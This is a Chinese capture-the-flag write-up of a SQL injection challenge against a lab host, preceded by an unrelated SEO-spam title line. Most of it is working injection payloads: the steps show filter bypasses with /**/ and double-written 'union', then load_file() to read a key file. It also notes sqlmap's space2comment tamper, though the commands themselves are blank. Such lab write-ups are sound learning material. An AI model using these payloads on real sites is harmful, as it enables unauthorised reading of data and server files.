怎樣做網(wǎng)站首頁圖片變換seo研究中心培訓(xùn)機(jī)構(gòu)
url:http://192.168.154.253:81/? #打開http://XXX:81/,XXX為靶機(jī)的ip地址
審題
1、打開題目看到有一個(gè)提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個(gè)文件中
2、開始答題
發(fā)現(xiàn)這里url中有一個(gè)id的參數(shù),并且給出了當(dāng)前所執(zhí)行的sql語句
第一步:判斷注入點(diǎn)
1、?id=1' |
2、?id=1'and'1'='1 |
第二步:判斷語句模板
1、使用 order by 判斷語句模板列數(shù) 發(fā)現(xiàn)語句在執(zhí)行中過濾了空格還過濾了“#” 執(zhí)行失敗: ?id=1'and'1'='1'order by 3# ?id=1'and'1'='1'order+by+3# |
執(zhí)行成功: ?id=1')and'1'='1'order/**/by/**/3%23 解釋: ?id=1')and'1'='1'order/**/by/**/3%23
|
2、判斷出語句模板有4個(gè)字段 回顯正常: ?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時(shí)候回顯正常 |
回顯不正常: ?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時(shí)候回顯不正常 |
第三步:找回顯點(diǎn)
回顯不正常: ?id=1')and'1'='2'union/**/select/**/1,2,3,4%23 思路:使用 and 1=2 報(bào)錯(cuò)找回顯點(diǎn) |
回顯正常: ?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23 思路:由于過濾了union,所以這里使用雙寫的方式經(jīng)行過濾繞過,并且判斷出回顯點(diǎn)有3個(gè)(語句模板中的2,3,4位置均為回顯點(diǎn)) |
第四步:拿到flag
執(zhí)行成功: ?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23 解釋: —— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')
|
擴(kuò)展:使用sqlmap一把梭哈
1、由于前面判斷出了此題注入點(diǎn)存在過濾空格的情況,所以在使用sqlmap的時(shí)候需要指定腳本(用注釋/**/替換空格字符' ':--tamper "space2comment.py")運(yùn)行 命令:
|
命令:
|
2、獲取到flag